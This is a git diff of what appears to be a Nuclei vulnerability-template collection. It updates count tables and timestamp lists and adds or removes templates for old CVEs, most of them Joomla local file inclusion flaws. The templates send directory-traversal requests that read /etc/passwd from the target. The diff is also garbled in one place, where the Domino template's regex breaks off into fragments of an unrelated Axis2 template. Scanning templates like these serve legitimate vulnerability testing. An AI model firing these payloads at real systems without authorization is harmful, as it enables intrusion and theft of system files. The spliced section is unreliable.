diff --git a/README.md b/README.md
index c7fd1c0b86..0d3867954c 100644
--- a/README.md
+++ b/README.md
@@ -20,100 +20,94 @@
| CVE-2016 | 254 |
| CVE-2017 | 406 |
| CVE-2018 | 453 |
-| CVE-2019 | 526 |
-| CVE-2020 | 609 |
+| CVE-2019 | 525 |
+| CVE-2020 | 610 |
| CVE-2021 | 1747 |
-| CVE-2022 | 2482 |
-| CVE-2023 | 4810 |
-| CVE-2024 | 6721 |
-| Other | 26610 |
+| CVE-2022 | 2483 |
+| CVE-2023 | 4809 |
+| CVE-2024 | 6737 |
+| Other | 26607 |
## 近几天数量变化情况
-|2024-11-13 | 2024-11-14 | 2024-11-15 | 2024-11-16 | 2024-11-17 | 2024-11-18 | 2024-11-19|
+|2024-11-14 | 2024-11-15 | 2024-11-16 | 2024-11-17 | 2024-11-18 | 2024-11-19 | 2024-11-20|
|--- | ------ | ------ | ------ | ------ | ------ | ---|
-|44923 | 45017 | 45136 | 46325 | 46327 | 46326 | 46344|
+|45017 | 45136 | 46325 | 46327 | 46326 | 46344 | 46357|
## 最近新增文件
| templates name |
| --- |
-| CVE-2024-51483.yaml |
-| CVE-2024-8673.yaml |
-| CVE-2022-48166.yaml |
-| CVE-2022-44356.yaml |
-| CVE-2022-48164.yaml |
-| alfresco-panel.yaml |
-| flexmls-detect.yaml |
-| sap-web-dispatcher-admin-portal-10073.yaml |
-| 2889691084.yaml |
-| 685878723.yaml |
-| 3548798736.yaml |
-| alternc-panel.yaml |
-| akuiteo-panel.yaml |
-| 573268496.yaml |
-| 2628791080.yaml |
-| 3140309955.yaml |
-| 1486043033.yaml |
-| 4243212760.yaml |
-| 173527743.yaml |
-| zte-panel-11838.yaml |
-| 1192756401.yaml |
-| 2265594678.yaml |
-| 2757251844.yaml |
-| 473762364.yaml |
-| 894225806.yaml |
-| 3696601540.yaml |
-| 2523211837.yaml |
-| 2193906630.yaml |
-| alamos-panel.yaml |
-| 990349172.yaml |
-| 3753806728.yaml |
-| 1400097940.yaml |
-| 3345020662.yaml |
-| 1163650083.yaml |
-| 60753597.yaml |
-| 3510444022.yaml |
-| thruk-panel.yaml |
-| 1755170981.yaml |
-| 471799455.yaml |
-| 2533318898.yaml |
-| 850295246.yaml |
-| 2723016985.yaml |
-| 3729878457.yaml |
-| fortinet-fgfm-detect.yaml |
-| zms-auth-bypass-11829.yaml |
-| 4025836132.yaml |
-| 4072408271.yaml |
-| 3931284557.yaml |
-| 1503454597.yaml |
-| 2227667957.yaml |
-| 2300926386.yaml |
-| 1408482974.yaml |
-| 594922867.yaml |
-| 2596613775.yaml |
-| 3692505568.yaml |
-| 2703944587.yaml |
-| 607989381.yaml |
-| 1814708429.yaml |
-| 1021548475.yaml |
-| 389500117.yaml |
-| setpreferences-xss(1).yaml |
-| 2959770951.yaml |
-| 2707902405.yaml |
-| etcpasswd.yaml |
-| 3699455206.yaml |
-| changedetection.yaml |
-| 1080568163.yaml |
-| 2179057332.yaml |
-| amazon-ecs-defualt-page.yaml |
-| 4137527400.yaml |
-| 2983633623.yaml |
-| 4037176294.yaml |
-| 1530733397.yaml |
-| 633451849.yaml |
-| 2576268398.yaml |
-| 2726089592.yaml |
-| 144853405.yaml |
-| 1980961746.yaml |
-| 781292612.yaml |
-| anmelden-panel.yaml |
-| 3133189941.yaml |
-| wl-wn533a8_firmware.yaml |
-| 2952330042.yaml |
+| CVE-2024-10390.yaml |
+| CVE-2024-10268.yaml |
+| CVE-2024-11038.yaml |
+| CVE-2024-11069.yaml |
+| CVE-2024-11194.yaml |
+| CVE-2024-9777.yaml |
+| CVE-2024-11098.yaml |
+| CVE-2024-10388.yaml |
+| CVE-2024-9830.yaml |
+| CVE-2024-11224.yaml |
+| CVE-2024-11036.yaml |
+| CVE-2024-11198.yaml |
+| CVE-2024-11195.yaml |
+| CVE-2024-10486.yaml |
+| 2604822861.yaml |
+| 9613321.yaml |
+| bookstack-detect-764.yaml |
+| 1014176159.yaml |
+| 3525784120.yaml |
+| 1200191409.yaml |
+| 1763074754.yaml |
+| 2770804765.yaml |
+| 4247767131.yaml |
+| 3716330286.yaml |
+| 3499183601.yaml |
+| 1574535231.yaml |
+| 1046994046.yaml |
+| 3777704211.yaml |
+| 3811557993.yaml |
+| 3224702519.yaml |
+| 3090881125.yaml |
+| 2257434466.yaml |
+| 387265915.yaml |
+| 2561678402.yaml |
+| 1727118266.yaml |
+| 1574414783.yaml |
+| 2423614041.yaml |
+| 1049614291.yaml |
+| 1777747741.yaml |
+| 1783847465.yaml |
+| 116146157.yaml |
+| 1858552467.yaml |
+| 4067984997.yaml |
+| 2826609747.yaml |
+| 834347683.yaml |
+| 2814510094.yaml |
+| 3691145095.yaml |
+| 3935867657.yaml |
+| 4204722075.yaml |
+| 2262855421.yaml |
+| 1374740076.yaml |
+| 1418728238.yaml |
+| 4103467147.yaml |
+| 3343906575.yaml |
+| 1775067121.yaml |
+| xss-headless.yaml |
+| 3530503205.yaml |
+| 4171721996.yaml |
+| 3614402370.yaml |
+| 1665372872.yaml |
+| 2378325249.yaml |
+| 1891948265.yaml |
+| 93174518.yaml |
+| 1826353917.yaml |
+| 1197002657.yaml |
+| 2598929970.yaml |
+| wpb-popup-for-contact-form-7.yaml |
+| elfsight-telegram-chat-cc.yaml |
+| 2893268144.yaml |
+| 3901038168.yaml |
+| 2763879923.yaml |
+| 3864206087.yaml |
+| 3293461041.yaml |
+| 1562174632.yaml |
+| 418548613.yaml |
+| 2188834782.yaml |
+| cve-2021-26722.yaml |
diff --git a/data.json b/data.json
index 52add08d2e..422daaf45b 100644
--- a/data.json
+++ b/data.json
@@ -255,5 +255,6 @@
"2024-11-16": 46325,
"2024-11-17": 46327,
"2024-11-18": 46326,
- "2024-11-19": 46344
+ "2024-11-19": 46344,
+ "2024-11-20": 46357
}
\ No newline at end of file
diff --git a/data1.json b/data1.json
index af63ac0955..2ac7b52a99 100644
--- a/data1.json
+++ b/data1.json
@@ -55015,5 +55015,82 @@
"anmelden-panel.yaml": "2024-11-19 02:34:38",
"3133189941.yaml": "2024-11-19 02:34:38",
"wl-wn533a8_firmware.yaml": "2024-11-19 02:34:38",
- "2952330042.yaml": "2024-11-19 02:34:38"
+ "2952330042.yaml": "2024-11-19 02:34:38",
+ "CVE-2024-10390.yaml": "2024-11-20 02:33:16",
+ "CVE-2024-10268.yaml": "2024-11-20 02:33:16",
+ "CVE-2024-11038.yaml": "2024-11-20 02:33:16",
+ "CVE-2024-11069.yaml": "2024-11-20 02:33:16",
+ "CVE-2024-11194.yaml": "2024-11-20 02:33:16",
+ "CVE-2024-9777.yaml": "2024-11-20 02:33:16",
+ "CVE-2024-11098.yaml": "2024-11-20 02:33:16",
+ "CVE-2024-10388.yaml": "2024-11-20 02:33:16",
+ "CVE-2024-9830.yaml": "2024-11-20 02:33:16",
+ "CVE-2024-11224.yaml": "2024-11-20 02:33:16",
+ "CVE-2024-11036.yaml": "2024-11-20 02:33:16",
+ "CVE-2024-11198.yaml": "2024-11-20 02:33:16",
+ "CVE-2024-11195.yaml": "2024-11-20 02:33:16",
+ "CVE-2024-10486.yaml": "2024-11-20 02:33:16",
+ "2604822861.yaml": "2024-11-20 02:33:16",
+ "9613321.yaml": "2024-11-20 02:33:16",
+ "bookstack-detect-764.yaml": "2024-11-20 02:33:16",
+ "1014176159.yaml": "2024-11-20 02:33:16",
+ "3525784120.yaml": "2024-11-20 02:33:16",
+ "1200191409.yaml": "2024-11-20 02:33:16",
+ "1763074754.yaml": "2024-11-20 02:33:16",
+ "2770804765.yaml": "2024-11-20 02:33:16",
+ "4247767131.yaml": "2024-11-20 02:33:16",
+ "3716330286.yaml": "2024-11-20 02:33:16",
+ "3499183601.yaml": "2024-11-20 02:33:16",
+ "1574535231.yaml": "2024-11-20 02:33:16",
+ "1046994046.yaml": "2024-11-20 02:33:16",
+ "3777704211.yaml": "2024-11-20 02:33:16",
+ "3811557993.yaml": "2024-11-20 02:33:16",
+ "3224702519.yaml": "2024-11-20 02:33:16",
+ "3090881125.yaml": "2024-11-20 02:33:16",
+ "2257434466.yaml": "2024-11-20 02:33:16",
+ "387265915.yaml": "2024-11-20 02:33:16",
+ "2561678402.yaml": "2024-11-20 02:33:16",
+ "1727118266.yaml": "2024-11-20 02:33:16",
+ "1574414783.yaml": "2024-11-20 02:33:16",
+ "2423614041.yaml": "2024-11-20 02:33:16",
+ "1049614291.yaml": "2024-11-20 02:33:16",
+ "1777747741.yaml": "2024-11-20 02:33:16",
+ "1783847465.yaml": "2024-11-20 02:33:16",
+ "116146157.yaml": "2024-11-20 02:33:16",
+ "1858552467.yaml": "2024-11-20 02:33:16",
+ "4067984997.yaml": "2024-11-20 02:33:16",
+ "2826609747.yaml": "2024-11-20 02:33:16",
+ "834347683.yaml": "2024-11-20 02:33:16",
+ "2814510094.yaml": "2024-11-20 02:33:16",
+ "3691145095.yaml": "2024-11-20 02:33:16",
+ "3935867657.yaml": "2024-11-20 02:33:16",
+ "4204722075.yaml": "2024-11-20 02:33:16",
+ "2262855421.yaml": "2024-11-20 02:33:16",
+ "1374740076.yaml": "2024-11-20 02:33:16",
+ "1418728238.yaml": "2024-11-20 02:33:16",
+ "4103467147.yaml": "2024-11-20 02:33:16",
+ "3343906575.yaml": "2024-11-20 02:33:16",
+ "1775067121.yaml": "2024-11-20 02:33:16",
+ "xss-headless.yaml": "2024-11-20 02:33:16",
+ "3530503205.yaml": "2024-11-20 02:33:16",
+ "4171721996.yaml": "2024-11-20 02:33:16",
+ "3614402370.yaml": "2024-11-20 02:33:16",
+ "1665372872.yaml": "2024-11-20 02:33:16",
+ "2378325249.yaml": "2024-11-20 02:33:16",
+ "1891948265.yaml": "2024-11-20 02:33:16",
+ "93174518.yaml": "2024-11-20 02:33:16",
+ "1826353917.yaml": "2024-11-20 02:33:16",
+ "1197002657.yaml": "2024-11-20 02:33:16",
+ "2598929970.yaml": "2024-11-20 02:33:16",
+ "wpb-popup-for-contact-form-7.yaml": "2024-11-20 02:33:16",
+ "elfsight-telegram-chat-cc.yaml": "2024-11-20 02:33:16",
+ "2893268144.yaml": "2024-11-20 02:33:16",
+ "3901038168.yaml": "2024-11-20 02:33:16",
+ "2763879923.yaml": "2024-11-20 02:33:16",
+ "3864206087.yaml": "2024-11-20 02:33:16",
+ "3293461041.yaml": "2024-11-20 02:33:16",
+ "1562174632.yaml": "2024-11-20 02:33:16",
+ "418548613.yaml": "2024-11-20 02:33:16",
+ "2188834782.yaml": "2024-11-20 02:33:16",
+ "cve-2021-26722.yaml": "2024-11-20 02:33:16"
}
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2005/CVE-2005-2428.yaml b/nuclei-templates/CVE-2005/CVE-2005-2428.yaml
new file mode 100644
index 0000000000..c74c52c360
--- /dev/null
+++ b/nuclei-templates/CVE-2005/CVE-2005-2428.yaml
@@ -0,0 +1,33 @@
+id: CVE-2005-2428
+info:
+ name: Lotus Domino R5 and R6 WebMail Default Configuration Information Disclosure
+ author: CasperGN
+ severity: medium
+ tags: cve,cve2005,domino
+ description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).
+ remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files.
+ reference:
+ - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
+ - https://www.exploit-db.com/exploits/39495
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2005-2428
+ cwe-id: CWE-200
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/names.nsf/People?OpenView"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: regex
+ name: domino-username
+ regex:
+ - '(Welcome to Axis2 Web Admin Module !!"
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/03/02
diff --git a/nuclei-templates/CVE-2010/CVE-2010-0759.yaml b/nuclei-templates/CVE-2010/CVE-2010-0759.yaml
deleted file mode 100644
index 3df6950eb6..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-0759.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2010-0759
-
-info:
- name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion
- author: daffainfo
- severity: high
- description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
- reference:
- - https://www.exploit-db.com/exploits/11498
- - https://www.cvedetails.com/cve/CVE-2010-0759
- - http://secunia.com/advisories/38637
- - http://www.securityfocus.com/bid/38296
- remediation: Upgrade to a supported version.
- classification:
- cve-id: CVE-2010-0759
- tags: cve,cve2010,joomla,lfi,plugin
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
- - type: status
- status:
- - 200
-# Enhanced by mp on 2022/02/13
diff --git a/nuclei-templates/CVE-2010/CVE-2010-0942.yaml b/nuclei-templates/CVE-2010/CVE-2010-0942.yaml
deleted file mode 100644
index cfbd90f032..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-0942.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: CVE-2010-0942
-
-info:
- name: Joomla! Component com_jvideodirect - Directory Traversal
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/11089
- - https://www.cvedetails.com/cve/CVE-2010-0942
- - http://packetstormsecurity.org/1001-exploits/joomlajvideodirect-traversal.txt
- remediation: Apply all relevant security patches and product upgrades.
- classification:
- cve-id: CVE-2010-0942
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
- - type: status
- status:
- - 200
-# Enhanced by mp on 2022/02/13
diff --git a/nuclei-templates/CVE-2010/CVE-2010-0972.yaml b/nuclei-templates/CVE-2010/CVE-2010-0972.yaml
deleted file mode 100644
index 37c142f65b..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-0972.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: CVE-2010-0972
-
-info:
- name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion
- author: daffainfo
- severity: high
- description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/11738
- - https://www.cvedetails.com/cve/CVE-2010-0972
- - http://secunia.com/advisories/38925
- remediation: Apply all relevant security patches and product upgrades.
- classification:
- cve-id: CVE-2010-0972
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
- - type: status
- status:
- - 200
-# Enhanced by mp on 2022/02/13
diff --git a/nuclei-templates/CVE-2010/CVE-2010-0982.yaml b/nuclei-templates/CVE-2010/CVE-2010-0982.yaml
deleted file mode 100644
index a69166498d..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-0982.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2010-0982
-
-info:
- name: Joomla! Component com_cartweberp - Local File Inclusion
- author: daffainfo
- severity: high
- description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/10942
- - https://www.cvedetails.com/cve/CVE-2010-0982
- - http://www.securityfocus.com/bid/37581
- - http://secunia.com/advisories/37917
- remediation: Apply all relevant security patches and product upgrades.
- classification:
- cve-id: CVE-2010-0982
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
- - type: status
- status:
- - 200
-# Enhanced by mp on 2022/02/13
diff --git a/nuclei-templates/CVE-2010/CVE-2010-0985.yaml b/nuclei-templates/CVE-2010/CVE-2010-0985.yaml
new file mode 100644
index 0000000000..614705c1c5
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-0985.yaml
@@ -0,0 +1,30 @@
+id: CVE-2010-0985
+
+info:
+ name: Joomla! Component com_abbrev - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/10948
+ - https://www.cvedetails.com/cve/CVE-2010-0985
+ - http://www.securityfocus.com/bid/37560
+ - http://osvdb.org/61458
+ remediation: Apply all relevant security patches and product upgrades.
+ classification:
+ cve-id: CVE-2010-0985
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/13
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1081.yaml b/nuclei-templates/CVE-2010/CVE-2010-1081.yaml
new file mode 100644
index 0000000000..c6a152e813
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-1081.yaml
@@ -0,0 +1,30 @@
+id: CVE-2010-1081
+
+info:
+ name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/11511
+ - https://www.cvedetails.com/cve/CVE-2010-1081
+ - http://osvdb.org/62506
+ - http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html
+ remediation: Apply all relevant security patches and product upgrades.
+ classification:
+ cve-id: CVE-2010-1081
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/13
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1217.yaml b/nuclei-templates/CVE-2010/CVE-2010-1217.yaml
new file mode 100644
index 0000000000..40edd4a34c
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-1217.yaml
@@ -0,0 +1,30 @@
+id: CVE-2010-1217
+
+info:
+ name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
+ reference:
+ - https://www.exploit-db.com/exploits/11814
+ - https://www.cvedetails.com/cve/CVE-2010-1217
+ - http://www.packetstormsecurity.org/1003-exploits/joomlajetooltip-lfi.txt
+ - http://www.securityfocus.com/bid/38866
+ remediation: Apply all relevant security patches and product upgrades.
+ classification:
+ cve-id: CVE-2010-1217
+ tags: cve,cve2010,joomla,lfi,plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/13
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1219.yaml b/nuclei-templates/CVE-2010/CVE-2010-1219.yaml
deleted file mode 100644
index 861e329273..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-1219.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2010-1219
-
-info:
- name: Joomla! Component com_janews - Local File Inclusion
- author: daffainfo
- severity: high
- description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/11757
- - https://www.cvedetails.com/cve/CVE-2010-1219
- - http://secunia.com/advisories/38952
- - http://www.securityfocus.com/bid/38746
- remediation: Upgrade to a supported version.
- classification:
- cve-id: CVE-2010-1219
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
- - type: status
- status:
- - 200
-# Enhanced by mp on 2022/02/14
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1302.yaml b/nuclei-templates/CVE-2010/CVE-2010-1302.yaml
new file mode 100644
index 0000000000..2fd71f6329
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-1302.yaml
@@ -0,0 +1,30 @@
+id: CVE-2010-1302
+
+info:
+ name: Joomla! Component DW Graph - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/11978
+ - https://www.cvedetails.com/cve/CVE-2010-1302
+ - http://www.securityfocus.com/bid/39108
+ - http://secunia.com/advisories/39200
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1302
+ tags: cve,cve2010,joomla,lfi,graph
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/14
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1304.yaml b/nuclei-templates/CVE-2010/CVE-2010-1304.yaml
new file mode 100644
index 0000000000..bc47af1a98
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-1304.yaml
@@ -0,0 +1,29 @@
+id: CVE-2010-1304
+
+info:
+ name: Joomla! Component User Status - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/11998
+ - https://www.cvedetails.com/cve/CVE-2010-1304
+ - http://www.securityfocus.com/bid/39174
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1304
+ tags: cve,cve2010,joomla,lfi,status
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/14
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1305.yaml b/nuclei-templates/CVE-2010/CVE-2010-1305.yaml
new file mode 100644
index 0000000000..4649188fed
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-1305.yaml
@@ -0,0 +1,30 @@
+id: CVE-2010-1305
+
+info:
+ name: Joomla! Component JInventory 1.23.02 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12065
+ - https://www.cvedetails.com/cve/CVE-2010-1305
+ - http://extensions.joomla.org/extensions/e-commerce/shopping-cart/7951
+ - http://secunia.com/advisories/39351
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1305
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/14
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1315.yaml b/nuclei-templates/CVE-2010/CVE-2010-1315.yaml
deleted file mode 100644
index d17b7846a7..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-1315.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2010-1315
-
-info:
- name: Joomla! Component webERPcustomer - Local File Inclusion
- author: daffainfo
- severity: high
- description: A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/11999
- - https://www.cvedetails.com/cve/CVE-2010-1315
- - http://secunia.com/advisories/39209
- - http://packetstormsecurity.org/1004-exploits/joomlaweberpcustomer-lfi.txt
- remediation: Upgrade to a supported version.
- classification:
- cve-id: CVE-2010-1315
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
- - type: status
- status:
- - 200
-# Enhanced by mp on 2022/02/14
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1345.yaml b/nuclei-templates/CVE-2010/CVE-2010-1345.yaml
new file mode 100644
index 0000000000..d97a1f819f
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-1345.yaml
@@ -0,0 +1,29 @@
+id: CVE-2010-1345
+
+info:
+ name: Joomla! Component Cookex Agency CKForms - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/15453
+ - https://www.cvedetails.com/cve/CVE-2010-1345
+ - http://www.exploit-db.com/exploits/11785
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1345
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/14
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1352.yaml b/nuclei-templates/CVE-2010/CVE-2010-1352.yaml
new file mode 100644
index 0000000000..9304332380
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-1352.yaml
@@ -0,0 +1,30 @@
+id: CVE-2010-1352
+
+info:
+ name: Joomla! Component Juke Box 1.7 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12084
+ - https://www.cvedetails.com/cve/CVE-2010-1352
+ - http://secunia.com/advisories/39357
+ - http://packetstormsecurity.org/1004-exploits/joomlajukebox-lfi.txt
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1352
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/14
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1354.yaml b/nuclei-templates/CVE-2010/CVE-2010-1354.yaml
deleted file mode 100644
index b6435650fe..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-1354.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2010-1354
-
-info:
- name: Joomla! Component VJDEO 1.0 - Local File Inclusion
- author: daffainfo
- severity: high
